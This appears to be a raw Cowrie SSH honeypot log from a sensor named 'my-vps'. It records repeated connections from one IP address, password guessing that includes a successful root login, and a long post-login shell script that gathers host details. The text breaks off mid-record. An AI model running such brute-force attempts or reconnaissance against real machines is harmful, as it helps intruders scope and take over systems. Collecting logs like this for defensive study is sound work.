{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48712,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4b5f4452aa","protocol":"ssh","message":"New connection: 212.227.235.229:48712 (1.2.3.4:22) [session: ef4b5f4452aa]","sensor":"my-vps","timestamp":"2025-08-26T21:15:07.290262Z"}
{"eventid":"cowrie.session.closed","duration":"45.0","message":"Connection lost after 45.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:07.437382Z","src_ip":"212.227.235.229","session":"1b87eec952dc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:15:08.591219Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:15:08.592042Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.login.success","username":"root","password":"p4ssw0rd","message":"login attempt [root/p4ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:15:15.986782Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:15:17.769855Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.770525Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.771249Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.772285Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.773526Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.774300Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.775265Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.776301Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.776863Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.777399Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.777946Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.778630Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:15:17.779000Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:15:18.980516Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:18.981455Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:18.982880Z","src_ip":"212.227.235.229","session":"ef4b5f4452aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54340,"dst_ip":"1.2.3.4","dst_port":22,"session":"09270dcf891e","protocol":"ssh","message":"New connection: 212.227.235.229:54340 (1.2.3.4:22) [session: 09270dcf891e]","sensor":"my-vps","timestamp":"2025-08-26T21:15:19.496481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:15:19.974004Z","src_ip":"212.227.235.229","session":"09270dcf891e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:15:20.141186Z","src_ip":"212.227.235.229","session":"09270dcf891e"}
{"eventid":"cowrie.login.failed","username":"test","password":"teest","message":"login attempt [test/teest] failed","sensor":"my-vps","timestamp":"2025-08-26T21:15:21.688476Z","src_ip":"212.227.235.229","session":"09270dcf891e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:23.371490Z","src_ip":"212.227.235.229","session":"09270dcf891e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54356,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab433a1603ef","protocol":"ssh","message":"New connection: 212.227.235.229:54356 (1.2.3.4:22) [session: ab433a1603ef]","sensor":"my-vps","timestamp":"2025-08-26T21:15:23.796834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:15:23.802361Z","src_ip":"212.227.235.229","session":"ab433a1603ef"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:15:24.173652Z","src_ip":"212.227.235.229","session":"ab433a1603ef"}
{"eventid":"cowrie.login.failed","username":"tushar","password":"tushar123","message":"login attempt [tushar/tushar123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:15:25.499951Z","src_ip":"212.227.235.229","session":"ab433a1603ef"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:26.808950Z","src_ip":"212.227.235.229","session":"ab433a1603ef"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:15:39.492887Z","src_ip":"212.227.235.229","session":"d3cfc9fd7560"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37516,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcf9c7300fe5","protocol":"ssh","message":"New connection: 212.227.235.229:37516 (1.2.3.4:22) [session: dcf9c7300fe5]","sensor":"my-vps","timestamp":"2025-08-26T21:15:47.251804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:15:47.265453Z","src_ip":"212.227.235.229","session":"dcf9c7300fe5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:15:47.808759Z","src_ip":"212.227.235.229","session":"dcf9c7300fe5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46074,"dst_ip":"1.2.3.4","dst_port":22,"session":"09df03c022bf","protocol":"ssh","message":"New connection: 212.227.235.229:46074 (1.2.3.4:22) [session: 09df03c022bf]","sensor":"my-vps","timestamp":"2025-08-26T21:15:48.433881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:15:48.441760Z","src_ip":"212.227.235.229","session":"09df03c022bf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-